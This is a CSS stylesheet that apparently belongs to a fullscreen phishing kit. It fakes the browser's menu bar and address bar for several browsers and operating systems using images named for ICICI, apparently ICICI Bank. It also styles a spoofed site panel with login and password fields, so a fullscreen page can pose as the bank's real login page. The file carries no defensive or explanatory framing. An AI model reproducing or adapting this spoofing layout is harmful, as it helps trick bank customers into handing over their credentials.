html.fullscreened {
  overflow-y: hidden;
  background-color: #fff;
}

.fullscreened #container { display: none; }





#spoofHeader {
  position: fixed;
  top: 0;
  left: 0;  
  width: 100%;
  z-index: 2;
}
.not-fullscreened #spoofHeader { display: none; }

#spoofMenu, #spoofBrowser { width: 100%; }


/* Menu (OS X only) */

.osx #spoofMenu { height: 22px; }
.windows #spoofMenu, .linux #spoofMenu { height: 0; }

.chrome.osx #spoofMenu {
  background: url(../img/menu-osx-chrome-left.png) left top no-repeat, url(../img/menu-osx-right.png) right top no-repeat, url(../img/menu-osx-bg.png) left top repeat-x;
}

.firefox.osx #spoofMenu {
  background: url(../img/menu-osx-firefox-left.png) left top no-repeat, url(../img/menu-osx-right.png) right top no-repeat, url(../img/menu-osx-bg.png) left top repeat-x;
}

.safari.osx #spoofMenu {
  background: url(../img/menu-osx-safari-left.png) left top no-repeat, url(../img/menu-osx-right.png) right top no-repeat, url(../img/menu-osx-bg.png) left top repeat-x;
}

/* Browser UI */

.chrome.osx #spoofBrowser {
  background: url(../img/browser-osx-chrome-left_icici.png) left top no-repeat, url(../img/browser-osx-chrome-right_icici.png) right top no-repeat, url(../img/browser-osx-chrome-bg_icici.png) left top repeat-x;
  height: 72px;
}

.chrome.windows #spoofBrowser {
  background: url(../img/browser-windows-chrome-left_icici.png) left top no-repeat, url(../img/browser-windows-chrome-right_icici.png) right top no-repeat, url(../img/browser-windows-chrome-bg_icici.png) left top repeat-x;
  height: 68px;
}

.chrome.linux #spoofBrowser {
  background: url(../img/browser-linux-chrome-left_icici.png) left top no-repeat, url(../img/browser-linux-chrome-right_icici.png) right top no-repeat, url(../img/browser-linux-chrome-bg_icici.png) left top repeat-x;
  height: 86px;
}

.firefox.osx #spoofBrowser {
  background: url(../img/browser-osx-firefox-center.png) center top no-repeat, url(../img/browser-osx-firefox-left_icici.png) left top no-repeat, url(../img/browser-osx-firefox-right_icici.png) right top no-repeat, url(../img/browser-osx-firefox-bg_icici.png) left top repeat-x;
  height: 87px;
}

.firefox.windows #spoofBrowser {
  background: url(../img/browser-windows-firefox-left_icici.png) left top no-repeat, url(../img/browser-windows-firefox-right_icici.png) right top no-repeat, url(../img/browser-windows-firefox-bg_icici.png) left top repeat-x;
  height: 63px;
}

.firefox.linux #spoofBrowser {
  background: url(../img/browser-linux-firefox-left_icici.png) left top no-repeat, url(../img/browser-linux-firefox-right_icici.png) right top no-repeat, url(../img/browser-linux-firefox-bg_icici.png) left top repeat-x;
  height: 90px;
}

.safari.osx #spoofBrowser {
  background: url(../img/browser-osx-safari-center.png) center top no-repeat, url(../img/browser-osx-safari-left_icici.png) left top no-repeat, url(../img/browser-osx-safari-right_icici.png) right top no-repeat, url(../img/browser-osx-safari-bg_icici.png) left top repeat-x;
  height: 72px;
}

.safari.windows #spoofBrowser {
  background: url(../img/browser-windows-safari-center.png) center top no-repeat, url(../img/browser-windows-safari-left.png) left top no-repeat, url(../img/browser-windows-safari-right.png) right top no-repeat, url(../img/browser-windows-safari-bg.png) left top repeat-x;
  height: 72px;
}


#spoofSite_icici {
  background-color: #fff;
  left: 0;
  margin: 0 auto; 
  overflow-y: scroll;
  position: fixed;
  width: 100%;
  z-index: 2;

  /* Updated in JS */
  top: 100px;
  height: 100% !important; 
}

.not-fullscreened #spoofSite_icici { display: none; }


#container-icici
{width:1200px; margin:auto;}



.banner-box_icici{width:29.77777%; float:left; background:white; border-radius:5px; padding:1%;}

.main_icici
{
	
	display:inline-block; 
	width:100%; 
	border-radius:13px; 
	height:550px;
	background:url(../img/2bg_icici.jpg);
    background-repeat: no-repeat;
	-webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
}

.label_icici
{
	float: left;
   width: 50%;    
   padding-top: 14px;
   color:#194D92;
   font-family:auto; 
   font-size:15px;
  }
  .button1_icici {background-color:#F3730E;}
  .button_icici {
  border: none;
  color: white;
  padding: 12px 20px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 15px;
  margin-left:152px; 
  cursor: pointer;
  border-radius:18px;
  width : 170px;
  
}
.hyper_icici
{
color:orange; 
margin-left:152px; 
font-style:italic;

}
.dot_icici {
  height: 20px;
    margin-top: -23px;
    width: 20px;
    background-color: darkblue;
    border-radius: 100%;
    font-size: 12px;
    color: white;
    margin-left: 47%;
    padding: 5px 3px 0px 3px;
}
input[type=text] {
 width: 84%;
    padding: 17px 7px;
   margin: 8px;
   box-shadow: 0px 2px 3px 1px #DFDCD6;  
   height: 5px;
   box-sizing: border-box;
   border-radius: 8px;
   border: none;
   margin-bottom:25px;
   }
   input[type=password] {
 width: 84%;
    padding: 17px 7px;
   margin: 8px;
   box-shadow: 0px 2px 3px 1px #DFDCD6;  
   height: 5px;
   box-sizing: border-box;
   border-radius: 8px;
   border: none;
   margin-bottom:25px;
   }
  
.p1_icici
{
	background:#3D3D3D; 
	display:inline-block; 
	width:100%;
}	
.p_icici
{
	background:white; 
	display:inline-block; 
	width:100%;
}